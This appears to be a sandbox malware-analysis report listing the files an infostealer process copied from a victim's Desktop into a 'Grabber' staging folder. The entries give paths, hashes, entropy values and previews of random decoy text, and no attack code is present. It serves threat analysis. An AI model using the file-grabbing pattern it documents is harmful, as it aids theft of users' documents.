Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU.pdf

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\LTKMYBSEYZ.pdf

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\YPSIACHYXW.jpg

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\ZBEDCJPBEY.png

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN.png

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.jpg

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
